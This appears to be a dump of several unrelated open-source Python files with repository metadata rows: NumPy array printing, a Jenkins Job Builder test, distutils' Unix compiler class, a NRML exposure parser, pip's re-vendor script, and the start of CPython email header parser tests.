if sys.version_info[0] >= 3:
from functools import reduce
def set_printoptions(precision=None, threshold=None, edgeitems=None,
linewidth=None, suppress=None,
nanstr=None, infstr=None):
"""
Set printing options.
These options determine the way floating point numbers, arrays and
other NumPy objects are displayed.
Parameters
----------
precision : int, optional
Number of digits of precision for floating point output (default 8).
threshold : int, optional
Total number of array elements which trigger summarization
rather than full repr (default 1000).
edgeitems : int, optional
Number of array items in summary at beginning and end of
each dimension (default 3).
linewidth : int, optional
The number of characters per line for the purpose of inserting
line breaks (default 75).
suppress : bool, optional
Whether or not to suppress printing of small floating point values
using scientific notation (default False).
nanstr : str, optional
String representation of floating point not-a-number (default nan).
infstr : str, optional
String representation of floating point infinity (default inf).
See Also
--------
get_printoptions, set_string_function
Examples
--------
Floating point precision can be set:
>>> np.set_printoptions(precision=4)
>>> print np.array([1.123456789])
[ 1.1235]
Long arrays can be summarised:
>>> np.set_printoptions(threshold=5)
>>> print np.arange(10)
[0 1 2 ..., 7 8 9]
Small results can be suppressed:
>>> eps = np.finfo(float).eps
>>> x = np.arange(4.)
>>> x**2 - (x + eps)**2
array([ -4.9304e-32, -4.4409e-16, 0.0000e+00, 0.0000e+00])
>>> np.set_printoptions(suppress=True)
>>> x**2 - (x + eps)**2
array([-0., -0., 0., 0.])
To put back the default options, you can use:
>>> np.set_printoptions(edgeitems=3,infstr='Inf',
... linewidth=75, nanstr='NaN', precision=8,
... suppress=False, threshold=1000)
"""
global _summaryThreshold, _summaryEdgeItems, _float_output_precision, \
_line_width, _float_output_suppress_small, _nan_str, _inf_str
if linewidth is not None:
_line_width = linewidth
if threshold is not None:
_summaryThreshold = threshold
if edgeitems is not None:
_summaryEdgeItems = edgeitems
if precision is not None:
_float_output_precision = precision
if suppress is not None:
_float_output_suppress_small = not not suppress
if nanstr is not None:
_nan_str = nanstr
if infstr is not None:
_inf_str = infstr
def get_printoptions():
"""
Return the current print options.
Returns
-------
print_opts : dict
Dictionary of current print options with keys
- precision : int
- threshold : int
- edgeitems : int
- linewidth : int
- suppress : bool
- nanstr : str
- infstr : str
For a full description of these options, see `set_printoptions`.
See Also
--------
set_printoptions, set_string_function
"""
d = dict(precision=_float_output_precision,
threshold=_summaryThreshold,
edgeitems=_summaryEdgeItems,
linewidth=_line_width,
suppress=_float_output_suppress_small,
nanstr=_nan_str,
infstr=_inf_str)
return d
def _leading_trailing(a):
import numeric as _nc
if a.ndim == 1:
if len(a) > 2*_summaryEdgeItems:
b = _nc.concatenate((a[:_summaryEdgeItems],
a[-_summaryEdgeItems:]))
else:
b = a
else:
if len(a) > 2*_summaryEdgeItems:
l = [_leading_trailing(a[i]) for i in range(
min(len(a), _summaryEdgeItems))]
l.extend([_leading_trailing(a[-i]) for i in range(
min(len(a), _summaryEdgeItems),0,-1)])
else:
l = [_leading_trailing(a[i]) for i in range(0, len(a))]
b = _nc.concatenate(tuple(l))
return b
def _boolFormatter(x):
if x: return ' True'
else: return 'False'
def _array2string(a, max_line_width, precision, suppress_small, separator=' ',
prefix=""):
if max_line_width is None:
max_line_width = _line_width
if precision is None:
precision = _float_output_precision
if suppress_small is None:
suppress_small = _float_output_suppress_small
if a.size > _summaryThreshold:
summary_insert = "..., "
data = _leading_trailing(a)
else:
summary_insert = ""
data = ravel(a)
try:
format_function = a._format
except AttributeError:
dtypeobj = a.dtype.type
if issubclass(dtypeobj, _nt.bool_):
# make sure True and False line up.
format_function = _boolFormatter
elif issubclass(dtypeobj, _nt.integer):
if issubclass(dtypeobj, _nt.timeinteger):
format_function = str
else:
max_str_len = max(len(str(maximum.reduce(data))),
len(str(minimum.reduce(data))))
format = '%' + str(max_str_len) + 'd'
format_function = lambda x: _formatInteger(x, format)
elif issubclass(dtypeobj, _nt.floating):
if issubclass(dtypeobj, _nt.longfloat):
format_function = _longfloatFormatter(precision)
else:
format_function = FloatFormat(data, precision, suppress_small)
elif issubclass(dtypeobj, _nt.complexfloating):
if issubclass(dtypeobj, _nt.clongfloat):
format_function = _clongfloatFormatter(precision)
else:
format_function = ComplexFormat(data, precision, suppress_small)
elif issubclass(dtypeobj, _nt.unicode_) or \
issubclass(dtypeobj, _nt.string_):
format_function = repr
else:
format_function = str
next_line_prefix = " " # skip over "["
next_line_prefix += " "*len(prefix) # skip over array(
lst = _formatArray(a, format_function, len(a.shape), max_line_width,
next_line_prefix, separator,
_summaryEdgeItems, summary_insert)[:-1]
return lst
def _convert_arrays(obj):
import numeric as _nc
newtup = []
for k in obj:
if isinstance(k, _nc.ndarray):
k = k.tolist()
elif isinstance(k, tuple):
k = _convert_arrays(k)
newtup.append(k)
return tuple(newtup)
def array2string(a, max_line_width = None, precision = None,
suppress_small = None, separator=' ', prefix="",
style=repr):
"""
Return a string representation of an array.
Parameters
----------
a : ndarray
Input array.
max_line_width : int, optional
The maximum number of columns the string should span. Newline
characters split the string appropriately after array elements.
precision : int, optional
Floating point precision. Default is the current printing
precision (usually 8), which can be altered using `set_printoptions`.
suppress_small : bool, optional
Represent very small numbers as zero. A number is "very small" if it
is smaller than the current printing precision.
separator : str, optional
Inserted between elements.
prefix : str, optional
An array is typically printed as::
'prefix(' + array2string(a) + ')'
The length of the prefix string is used to align the
output correctly.
style : function, optional
A function that accepts an ndarray and returns a string. Used only
when the shape of `a` is equal to ().
Returns
-------
array_str : str
String representation of the array.
See Also
--------
array_str, array_repr, set_printoptions
Examples
--------
>>> x = np.array([1e-16,1,2,3])
>>> print np.array2string(x, precision=2, separator=',',
... suppress_small=True)
[ 0., 1., 2., 3.]
"""
if a.shape == ():
x = a.item()
try:
lst = a._format(x)
except AttributeError:
if isinstance(x, tuple):
x = _convert_arrays(x)
lst = style(x)
elif reduce(product, a.shape) == 0:
# treat as a null array if any of shape elements == 0
lst = "[]"
else:
lst = _array2string(a, max_line_width, precision, suppress_small,
separator, prefix)
return lst
def _extendLine(s, line, word, max_line_len, next_line_prefix):
if len(line.rstrip()) + len(word.rstrip()) >= max_line_len:
s += line.rstrip() + "\n"
line = next_line_prefix
line += word
return s, line
def _formatArray(a, format_function, rank, max_line_len,
next_line_prefix, separator, edge_items, summary_insert):
"""formatArray is designed for two modes of operation:
1. Full output
2. Summarized output
"""
if rank == 0:
obj = a.item()
if isinstance(obj, tuple):
obj = _convert_arrays(obj)
return str(obj)
if summary_insert and 2*edge_items < len(a):
leading_items, trailing_items, summary_insert1 = \
edge_items, edge_items, summary_insert
else:
leading_items, trailing_items, summary_insert1 = 0, len(a), ""
if rank == 1:
s = ""
line = next_line_prefix
for i in xrange(leading_items):
word = format_function(a[i]) + separator
s, line = _extendLine(s, line, word, max_line_len, next_line_prefix)
if summary_insert1:
s, line = _extendLine(s, line, summary_insert1, max_line_len, next_line_prefix)
for i in xrange(trailing_items, 1, -1):
word = format_function(a[-i]) + separator
s, line = _extendLine(s, line, word, max_line_len, next_line_prefix)
word = format_function(a[-1])
s, line = _extendLine(s, line, word, max_line_len, next_line_prefix)
s += line + "]\n"
s = '[' + s[len(next_line_prefix):]
else:
s = '['
sep = separator.rstrip()
for i in xrange(leading_items):
if i > 0:
s += next_line_prefix
s += _formatArray(a[i], format_function, rank-1, max_line_len,
" " + next_line_prefix, separator, edge_items,
summary_insert)
s = s.rstrip() + sep.rstrip() + '\n'*max(rank-1,1)
if summary_insert1:
s += next_line_prefix + summary_insert1 + "\n"
for i in xrange(trailing_items, 1, -1):
if leading_items or i != trailing_items:
s += next_line_prefix
s += _formatArray(a[-i], format_function, rank-1, max_line_len,
" " + next_line_prefix, separator, edge_items,
summary_insert)
s = s.rstrip() + sep.rstrip() + '\n'*max(rank-1,1)
if leading_items or trailing_items > 1:
s += next_line_prefix
s += _formatArray(a[-1], format_function, rank-1, max_line_len,
" " + next_line_prefix, separator, edge_items,
summary_insert).rstrip()+']\n'
return s
class FloatFormat(object):
def __init__(self, data, precision, suppress_small, sign=False):
self.precision = precision
self.suppress_small = suppress_small
self.sign = sign
self.exp_format = False
self.large_exponent = False
self.max_str_len = 0
self.fillFormat(data)
def fillFormat(self, data):
import numeric as _nc
errstate = _nc.seterr(all='ignore')
try:
special = isnan(data) | isinf(data)
non_zero = absolute(data.compress(not_equal(data, 0) & ~special))
if len(non_zero) == 0:
max_val = 0.
min_val = 0.
else:
max_val = maximum.reduce(non_zero)
min_val = minimum.reduce(non_zero)
if max_val >= 1.e8:
self.exp_format = True
if not self.suppress_small and (min_val < 0.0001
or max_val/min_val > 1000.):
self.exp_format = True
finally:
_nc.seterr(**errstate)
if self.exp_format:
self.large_exponent = 0 < min_val < 1e-99 or max_val >= 1e100
self.max_str_len = 8 + self.precision
if self.large_exponent:
self.max_str_len += 1
if self.sign:
format = '%+'
else:
format = '%'
format = format + '%d.%de' % (self.max_str_len, self.precision)
else:
format = '%%.%df' % (self.precision,)
if len(non_zero):
precision = max([_digits(x, self.precision, format)
for x in non_zero])
else:
precision = 0
precision = min(self.precision, precision)
self.max_str_len = len(str(int(max_val))) + precision + 2
if _nc.any(special):
self.max_str_len = max(self.max_str_len,
len(_nan_str),
len(_inf_str)+1)
if self.sign:
format = '%#+'
else:
format = '%#'
format = format + '%d.%df' % (self.max_str_len, precision)
self.special_fmt = '%%%ds' % (self.max_str_len,)
self.format = format
def __call__(self, x, strip_zeros=True):
import numeric as _nc
err = _nc.seterr(invalid='ignore')
try:
if isnan(x):
return self.special_fmt % (_nan_str,)
elif isinf(x):
if x > 0:
return self.special_fmt % (_inf_str,)
else:
return self.special_fmt % ('-' + _inf_str,)
finally:
_nc.seterr(**err)
s = self.format % x
if self.large_exponent:
# 3-digit exponent
expsign = s[-3]
if expsign == '+' or expsign == '-':
s = s[1:-2] + '0' + s[-2:]
elif self.exp_format:
# 2-digit exponent
if s[-3] == '0':
s = ' ' + s[:-3] + s[-2:]
elif strip_zeros:
z = s.rstrip('0')
s = z + ' '*(len(s)-len(z))
return s
def _digits(x, precision, format):
s = format % x
z = s.rstrip('0')
return precision - len(s) + len(z)
_MAXINT = sys.maxint
_MININT = -sys.maxint-1
def _formatInteger(x, format):
if _MININT < x < _MAXINT:
return format % x
else:
return "%s" % x
def _longfloatFormatter(precision):
# XXX Have to add something to determine the width to use a la FloatFormat
# Right now, things won't line up properly
def formatter(x):
if isnan(x):
return _nan_str
elif isinf(x):
if x > 0:
return _inf_str
else:
return '-' + _inf_str
return format_longfloat(x, precision)
return formatter
def _clongfloatFormatter(precision):
def formatter(x):
r = format_longfloat(x.real, precision)
i = format_longfloat(x.imag, precision)
return '%s+%sj' % (r, i)
return formatter
class ComplexFormat(object):
def __init__(self, x, precision, suppress_small):
self.real_format = FloatFormat(x.real, precision, suppress_small)
self.imag_format = FloatFormat(x.imag, precision, suppress_small,
sign=True)
def __call__(self, x):
r = self.real_format(x.real, strip_zeros=False)
i = self.imag_format(x.imag, strip_zeros=False)
if not self.imag_format.exp_format:
z = i.rstrip('0')
i = z + 'j' + ' '*(len(i)-len(z))
else:
i = i + 'j'
return r + i
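# Summary of FloatFormat's mode selection above (comment only): exponential
# notation is chosen when max_val >= 1.e8, or -- unless suppress_small is
# set -- when min_val < 0.0001 or max_val/min_val > 1000.; otherwise a
# fixed-point format with at most `precision` digits is used.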
## end
|
wsoula/jenkins-job-builder
|
refs/heads/master
|
tests/publishers/test_publishers.py
|
11
|
# Joint copyright:
# - Copyright 2012,2013 Wikimedia Foundation
# - Copyright 2012,2013 Antoine "hashar" Musso
# - Copyright 2013 Arnaud Fabre
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from jenkins_jobs.modules import publishers
from tests import base
class TestCaseModulePublishers(base.BaseScenariosTestCase):
fixtures_path = os.path.join(os.path.dirname(__file__), 'fixtures')
scenarios = base.get_scenarios(fixtures_path)
klass = publishers.Publishers
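# The scenario runner above enumerates fixture pairs found in fixtures_path
# (presumably one input YAML per expected XML output), so adding a publisher
# test is a matter of dropping a new pair of fixture files into that
# directory.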
|
sexroute/commandergenius
|
refs/heads/sdl_android
|
project/jni/python/src/Lib/distutils/unixccompiler.py
|
33
|
"""distutils.unixccompiler
Contains the UnixCCompiler class, a subclass of CCompiler that handles
the "typical" Unix-style command-line C compiler:
* macros defined with -Dname[=value]
* macros undefined with -Uname
* include search directories specified with -Idir
* libraries specified with -llib
* library search directories specified with -Ldir
* compile handled by 'cc' (or similar) executable with -c option:
compiles .c to .o
* link static library handled by 'ar' command (possibly with 'ranlib')
* link shared library handled by 'cc -shared'
"""
__revision__ = "$Id: unixccompiler.py 65012 2008-07-16 13:24:06Z jesse.noller $"
import os, sys
from types import StringType, NoneType
from distutils import sysconfig
from distutils.dep_util import newer
from distutils.ccompiler import \
CCompiler, gen_preprocess_options, gen_lib_options
from distutils.errors import \
DistutilsExecError, CompileError, LibError, LinkError
from distutils import log
# XXX Things not currently handled:
# * optimization/debug/warning flags; we just use whatever's in Python's
# Makefile and live with it. Is this adequate? If not, we might
# have to have a bunch of subclasses GNUCCompiler, SGICCompiler,
# SunCCompiler, and I suspect down that road lies madness.
# * even if we don't know a warning flag from an optimization flag,
# we need some way for outsiders to feed preprocessor/compiler/linker
# flags in to us -- eg. a sysadmin might want to mandate certain flags
# via a site config file, or a user might want to set something for
# compiling this module distribution only via the setup.py command
# line, whatever. As long as these options come from something on the
# current system, they can be as system-dependent as they like, and we
# should just happily stuff them into the preprocessor/compiler/linker
# options and carry on.
def _darwin_compiler_fixup(compiler_so, cc_args):
"""
This function will strip '-isysroot PATH' and '-arch ARCH' from the
compile flags if the user has specified one them in extra_compile_flags.
This is needed because '-arch ARCH' adds another architecture to the
build, without a way to remove an architecture. Furthermore GCC will
barf if multiple '-isysroot' arguments are present.
"""
stripArch = stripSysroot = 0
compiler_so = list(compiler_so)
kernel_version = os.uname()[2] # 8.4.3
major_version = int(kernel_version.split('.')[0])
if major_version < 8:
# OSX before 10.4.0, these don't support -arch and -isysroot at
# all.
stripArch = stripSysroot = True
else:
stripArch = '-arch' in cc_args
stripSysroot = '-isysroot' in cc_args
if stripArch or 'ARCHFLAGS' in os.environ:
while 1:
try:
index = compiler_so.index('-arch')
# Strip this argument and the next one:
del compiler_so[index:index+2]
except ValueError:
break
if 'ARCHFLAGS' in os.environ and not stripArch:
# User specified different -arch flags in the environ,
# see also distutils.sysconfig
compiler_so = compiler_so + os.environ['ARCHFLAGS'].split()
if stripSysroot:
try:
index = compiler_so.index('-isysroot')
# Strip this argument and the next one:
del compiler_so[index:index+2]
except ValueError:
pass
# Check if the SDK that is used during compilation actually exists,
# the universal build requires the usage of a universal SDK and not all
# users have that installed by default.
sysroot = None
if '-isysroot' in cc_args:
idx = cc_args.index('-isysroot')
sysroot = cc_args[idx+1]
elif '-isysroot' in compiler_so:
idx = compiler_so.index('-isysroot')
sysroot = compiler_so[idx+1]
if sysroot and not os.path.isdir(sysroot):
log.warn("Compiling with an SDK that doesn't seem to exist: %s",
sysroot)
log.warn("Please check your Xcode installation")
return compiler_so
class UnixCCompiler(CCompiler):
compiler_type = 'unix'
# These are used by CCompiler in two places: the constructor sets
# instance attributes 'preprocessor', 'compiler', etc. from them, and
# 'set_executable()' allows any of these to be set. The defaults here
# are pretty generic; they will probably have to be set by an outsider
# (eg. using information discovered by the sysconfig about building
# Python extensions).
executables = {'preprocessor' : None,
'compiler' : ["cc"],
'compiler_so' : ["cc"],
'compiler_cxx' : ["cc"],
'linker_so' : ["cc", "-shared"],
'linker_exe' : ["cc"],
'archiver' : ["ar", "-cr"],
'ranlib' : None,
}
if sys.platform[:6] == "darwin":
executables['ranlib'] = ["ranlib"]
# Needed for the filename generation methods provided by the base
# class, CCompiler. NB. whoever instantiates/uses a particular
# UnixCCompiler instance should set 'shared_lib_ext' -- we set a
# reasonable common default here, but it's not necessarily used on all
# Unices!
src_extensions = [".c",".C",".cc",".cxx",".cpp",".m"]
obj_extension = ".o"
static_lib_extension = ".a"
shared_lib_extension = ".so"
dylib_lib_extension = ".dylib"
static_lib_format = shared_lib_format = dylib_lib_format = "lib%s%s"
if sys.platform == "cygwin":
exe_extension = ".exe"
def preprocess(self, source,
output_file=None, macros=None, include_dirs=None,
extra_preargs=None, extra_postargs=None):
ignore, macros, include_dirs = \
self._fix_compile_args(None, macros, include_dirs)
pp_opts = gen_preprocess_options(macros, include_dirs)
pp_args = self.preprocessor + pp_opts
if output_file:
pp_args.extend(['-o', output_file])
if extra_preargs:
pp_args[:0] = extra_preargs
if extra_postargs:
pp_args.extend(extra_postargs)
pp_args.append(source)
# We need to preprocess: either we're being forced to, or we're
# generating output to stdout, or there's a target output file and
# the source file is newer than the target (or the target doesn't
# exist).
if self.force or output_file is None or newer(source, output_file):
if output_file:
self.mkpath(os.path.dirname(output_file))
try:
self.spawn(pp_args)
except DistutilsExecError, msg:
raise CompileError, msg
def _compile(self, obj, src, ext, cc_args, extra_postargs, pp_opts):
compiler_so = self.compiler_so
if sys.platform == 'darwin':
compiler_so = _darwin_compiler_fixup(compiler_so, cc_args + extra_postargs)
try:
self.spawn(compiler_so + cc_args + [src, '-o', obj] +
extra_postargs)
except DistutilsExecError, msg:
raise CompileError, msg
def create_static_lib(self, objects, output_libname,
output_dir=None, debug=0, target_lang=None):
objects, output_dir = self._fix_object_args(objects, output_dir)
output_filename = \
self.library_filename(output_libname, output_dir=output_dir)
if self._need_link(objects, output_filename):
self.mkpath(os.path.dirname(output_filename))
self.spawn(self.archiver +
[output_filename] +
objects + self.objects)
# Not many Unices required ranlib anymore -- SunOS 4.x is, I
# think the only major Unix that does. Maybe we need some
# platform intelligence here to skip ranlib if it's not
# needed -- or maybe Python's configure script took care of
# it for us, hence the check for leading colon.
if self.ranlib:
try:
self.spawn(self.ranlib + [output_filename])
except DistutilsExecError, msg:
raise LibError, msg
else:
log.debug("skipping %s (up-to-date)", output_filename)
def link(self, target_desc, objects,
output_filename, output_dir=None, libraries=None,
library_dirs=None, runtime_library_dirs=None,
export_symbols=None, debug=0, extra_preargs=None,
extra_postargs=None, build_temp=None, target_lang=None):
objects, output_dir = self._fix_object_args(objects, output_dir)
libraries, library_dirs, runtime_library_dirs = \
self._fix_lib_args(libraries, library_dirs, runtime_library_dirs)
lib_opts = gen_lib_options(self, library_dirs, runtime_library_dirs,
libraries)
if type(output_dir) not in (StringType, NoneType):
raise TypeError, "'output_dir' must be a string or None"
if output_dir is not None:
output_filename = os.path.join(output_dir, output_filename)
if self._need_link(objects, output_filename):
ld_args = (objects + self.objects +
lib_opts + ['-o', output_filename])
if debug:
ld_args[:0] = ['-g']
if extra_preargs:
ld_args[:0] = extra_preargs
if extra_postargs:
ld_args.extend(extra_postargs)
self.mkpath(os.path.dirname(output_filename))
try:
if target_desc == CCompiler.EXECUTABLE:
linker = self.linker_exe[:]
else:
linker = self.linker_so[:]
if target_lang == "c++" and self.compiler_cxx:
# skip over environment variable settings if /usr/bin/env
# is used to set up the linker's environment.
# This is needed on OSX. Note: this assumes that the
# normal and C++ compiler have the same environment
# settings.
i = 0
if os.path.basename(linker[0]) == "env":
i = 1
while '=' in linker[i]:
i = i + 1
linker[i] = self.compiler_cxx[i]
if sys.platform == 'darwin':
linker = _darwin_compiler_fixup(linker, ld_args)
self.spawn(linker + ld_args)
except DistutilsExecError, msg:
raise LinkError, msg
else:
log.debug("skipping %s (up-to-date)", output_filename)
# -- Miscellaneous methods -----------------------------------------
# These are all used by the 'gen_lib_options() function, in
# ccompiler.py.
def library_dir_option(self, dir):
return "-L" + dir
def runtime_library_dir_option(self, dir):
# XXX Hackish, at the very least. See Python bug #445902:
# http://sourceforge.net/tracker/index.php
# ?func=detail&aid=445902&group_id=5470&atid=105470
# Linkers on different platforms need different options to
# specify that directories need to be added to the list of
# directories searched for dependencies when a dynamic library
# is sought. GCC has to be told to pass the -R option through
# to the linker, whereas other compilers just know this.
# Other compilers may need something slightly different. At
# this time, there's no way to determine this information from
# the configuration data stored in the Python installation, so
# we use this hack.
compiler = os.path.basename(sysconfig.get_config_var("CC"))
if sys.platform[:6] == "darwin":
# MacOSX's linker doesn't understand the -R flag at all
return "-L" + dir
elif sys.platform[:5] == "hp-ux":
return "+s -L" + dir
elif sys.platform[:7] == "irix646" or sys.platform[:6] == "osf1V5":
return ["-rpath", dir]
elif compiler[:3] == "gcc" or compiler[:3] == "g++":
return "-Wl,-R" + dir
else:
return "-R" + dir
def library_option(self, lib):
return "-l" + lib
def find_library_file(self, dirs, lib, debug=0):
shared_f = self.library_filename(lib, lib_type='shared')
dylib_f = self.library_filename(lib, lib_type='dylib')
static_f = self.library_filename(lib, lib_type='static')
for dir in dirs:
shared = os.path.join(dir, shared_f)
dylib = os.path.join(dir, dylib_f)
static = os.path.join(dir, static_f)
# We're second-guessing the linker here, with not much hard
# data to go on: GCC seems to prefer the shared library, so I'm
# assuming that *all* Unix C compilers do. And of course I'm
# ignoring even GCC's "-static" option. So sue me.
if os.path.exists(dylib):
return dylib
elif os.path.exists(shared):
return shared
elif os.path.exists(static):
return static
# Oops, didn't find it in *any* of 'dirs'
return None
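# Illustrative return values of runtime_library_dir_option above for a
# hypothetical dir "/opt/lib":
#
#     darwin             -> "-L/opt/lib"
#     hp-ux              -> "+s -L/opt/lib"
#     irix646 / osf1V5   -> ["-rpath", "/opt/lib"]
#     gcc / g++          -> "-Wl,-R/opt/lib"
#     other compilers    -> "-R/opt/lib"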
|
mabevillar/rmtk
|
refs/heads/master
|
rmtk/plotting/common/parse_exposure.py
|
3
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# LICENSE
#
# Copyright (c) 2010-2014, GEM Foundation, V. Silva
#
# The Risk Modellers Toolkit is free software: you can redistribute
# it and/or modify it under the terms of the GNU Affero General Public
# License as published by the Free Software Foundation, either version
# 3 of the License, or (at your option) any later version.
#
# You should have received a copy of the GNU Affero General Public License
# along with OpenQuake. If not, see <http://www.gnu.org/licenses/>
#
# DISCLAIMER
#
# The software Risk Modellers Toolkit (rmtk) provided herein
# is released as a prototype implementation on behalf of
# scientists and engineers working within the GEM Foundation (Global
# Earthquake Model).
#
# It is distributed for the purpose of open collaboration and in the
# hope that it will be useful to the scientific, engineering, disaster
# risk and software design communities.
#
# The software is NOT distributed as part of GEMs OpenQuake suite
# (http://www.globalquakemodel.org/openquake) and must be considered as a
# separate entity. The software provided herein is designed and implemented
# by scientific staff. It is not developed to the design standards, nor
# subject to same level of critical review by professional software
# developers, as GEMs OpenQuake software suite.
#
# Feedback and contribution to the software is welcome, and can be
# directed to the risk scientific staff of the GEM Model Facility
# (risk@globalquakemodel.org).
#
# The Risk Modellers Toolkit (rmtk) is therefore distributed WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# The GEM Foundation, and the authors of the software, assume no
# liability for use of the software.
# -*- coding: utf-8 -*-
'''
Parse an exposure model in order to acquire the list of
ids and taxonomies
'''
import os
import csv
import argparse
import numpy as np
from lxml import etree
xmlNRML='{http://openquake.org/xmlns/nrml/0.4}'
xmlGML = '{http://www.opengis.net/gml}'
def exposureModelParser(input_file):
id_taxonomies = []
for _, element in etree.iterparse(input_file):
if element.tag == '%sasset' % xmlNRML:
id_taxonomies.append([element.attrib.get('id'), element.attrib.get('taxonomy')])
else:
continue
return id_taxonomies
def extractIDTaxonomies(nrml_exposure_model, save_flag):
'''
Extracts the ids and taxonomies from an exposure model and saves
them to a text file if save_flag is set
'''
id_taxonomies = exposureModelParser(nrml_exposure_model)
if save_flag:
output_file = open(nrml_exposure_model.replace('.xml', '.txt'), 'w')
for id_taxonomy in id_taxonomies:
output_file.write(id_taxonomy[0]+','+id_taxonomy[1]+'\n')
output_file.close()
return id_taxonomies
def set_up_arg_parser():
"""
Can run as executable. To do so, set up the command line parser
"""
parser = argparse.ArgumentParser(
description='Extract the list of asset ids and taxonomies from a NRML '
'exposure model file and optionally save them to a .txt file. '
'To run just type: python parse_exposure.py '
'--input-file=PATH_TO_EXPOSURE_MODEL_NRML_FILE ', add_help=False)
flags = parser.add_argument_group('flag arguments')
flags.add_argument('-h', '--help', action='help')
flags.add_argument('--input-file',
help='path to exposure model NRML file (Required)',
default=None,
required=True)
flags.add_argument('--save', action="store_true",
help='Save taxonomies to a text file',
default=None,
required=False)
return parser
if __name__ == "__main__":
parser = set_up_arg_parser()
args = parser.parse_args()
if args.input_file:
extractIDTaxonomies(args.input_file,args.save)
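# Usage sketch (illustrative file name):
#
#     python parse_exposure.py --input-file=exposure_model.xml --save
#
# This writes one "id,taxonomy" line per asset to exposure_model.txt next
# to the input file.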
|
Ahmad31/Web_Flask_Cassandra
|
refs/heads/master
|
flask/lib/python2.7/site-packages/pip/_vendor/re-vendor.py
|
1240
|
import os
import sys
import pip
import glob
import shutil
here = os.path.abspath(os.path.dirname(__file__))
def usage():
print("Usage: re-vendor.py [clean|vendor]")
sys.exit(1)
def clean():
for fn in os.listdir(here):
dirname = os.path.join(here, fn)
if os.path.isdir(dirname):
shutil.rmtree(dirname)
# six is a single file, not a package
os.unlink(os.path.join(here, 'six.py'))
def vendor():
pip.main(['install', '-t', here, '-r', 'vendor.txt'])
for dirname in glob.glob('*.egg-info'):
shutil.rmtree(dirname)
if __name__ == '__main__':
if len(sys.argv) != 2:
usage()
if sys.argv[1] == 'clean':
clean()
elif sys.argv[1] == 'vendor':
vendor()
else:
usage()
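# Usage sketch (illustrative):
#
#     python re-vendor.py clean    # remove the vendored packages
#     python re-vendor.py vendor   # pip-install vendor.txt into this dir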
|
praekelt/txtalert
|
refs/heads/develop
|
txtalert/apps/general/__init__.py
|
12133432
| |
Zhongqilong/kbengine
|
refs/heads/master
|
kbe/res/scripts/common/Lib/test/test_email/test__header_value_parser.py
|
68
|
import string
import unittest
from email import _header_value_parser as parser
from email import errors
from email import policy
from test.test_email import TestEmailBase, parameterize
class TestTokens(TestEmailBase):
# EWWhiteSpaceTerminal
def test_EWWhiteSpaceTerminal(self):
x = parser.EWWhiteSpaceTerminal(' \t', 'fws')
self.assertEqual(x, ' \t')
self.assertEqual(str(x), '')
self.assertEqual(x.value, '')
self.assertEqual(x.encoded, ' \t')
# UnstructuredTokenList
def test_undecodable_bytes_error_preserved(self):
badstr = b"le pouf c\xaflebre".decode('ascii', 'surrogateescape')
unst = parser.get_unstructured(badstr)
self.assertDefectsEqual(unst.all_defects, [errors.UndecodableBytesDefect])
parts = list(unst.parts)
self.assertDefectsEqual(parts[0].all_defects, [])
self.assertDefectsEqual(parts[1].all_defects, [])
self.assertDefectsEqual(parts[2].all_defects, [errors.UndecodableBytesDefect])
class TestParserMixin:
def _assert_results(self, tl, rest, string, value, defects, remainder,
comments=None):
self.assertEqual(str(tl), string)
self.assertEqual(tl.value, value)
self.assertDefectsEqual(tl.all_defects, defects)
self.assertEqual(rest, remainder)
if comments is not None:
self.assertEqual(tl.comments, comments)
    def _test_get_x(self, method, source, string, value, defects,
                          remainder, comments=None):
        tl, rest = method(source)
        self._assert_results(tl, rest, string, value, defects, remainder,
                             comments=comments)
return tl
def _test_parse_x(self, method, input, string, value, defects,
comments=None):
tl = method(input)
self._assert_results(tl, '', string, value, defects, '', comments)
return tl
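# A quick sketch of the TestParserMixin contract: each parser.get_* function
# returns a (token, remainder) pair, and _test_get_x checks, in order, the
# token's string form, its .value, its defect list, and the unparsed
# remainder.  For example (cf. test_get_fws_space below):
#
#     fws, rest = parser.get_fws(' foo')
#     # str(fws) == ' ', fws.value == ' ', rest == 'foo'
#
# _test_parse_x plays the same role for the parse_* functions, which consume
# the whole input and so leave an empty remainder.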
class TestParser(TestParserMixin, TestEmailBase):
# _wsp_splitter
rfc_printable_ascii = bytes(range(33, 127)).decode('ascii')
rfc_atext_chars = (string.ascii_letters + string.digits +
"!#$%&\'*+-/=?^_`{}|~")
    rfc_dtext_chars = rfc_printable_ascii.translate(str.maketrans('', '', r'\[]'))
def test__wsp_splitter_one_word(self):
self.assertEqual(parser._wsp_splitter('foo', 1), ['foo'])
def test__wsp_splitter_two_words(self):
self.assertEqual(parser._wsp_splitter('foo def', 1),
['foo', ' ', 'def'])
def test__wsp_splitter_ws_runs(self):
self.assertEqual(parser._wsp_splitter('foo \t def jik', 1),
['foo', ' \t ', 'def jik'])
# get_fws
def test_get_fws_only(self):
fws = self._test_get_x(parser.get_fws, ' \t ', ' \t ', ' ', [], '')
self.assertEqual(fws.token_type, 'fws')
def test_get_fws_space(self):
self._test_get_x(parser.get_fws, ' foo', ' ', ' ', [], 'foo')
def test_get_fws_ws_run(self):
self._test_get_x(parser.get_fws, ' \t foo ', ' \t ', ' ', [], 'foo ')
# get_encoded_word
def test_get_encoded_word_missing_start_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_encoded_word('abc')
def test_get_encoded_word_missing_end_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_encoded_word('=?abc')
def test_get_encoded_word_missing_middle_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_encoded_word('=?abc?=')
def test_get_encoded_word_valid_ew(self):
self._test_get_x(parser.get_encoded_word,
'=?us-ascii?q?this_is_a_test?= bird',
'this is a test',
'this is a test',
[],
' bird')
def test_get_encoded_word_internal_spaces(self):
self._test_get_x(parser.get_encoded_word,
'=?us-ascii?q?this is a test?= bird',
'this is a test',
'this is a test',
[errors.InvalidHeaderDefect],
' bird')
def test_get_encoded_word_gets_first(self):
self._test_get_x(parser.get_encoded_word,
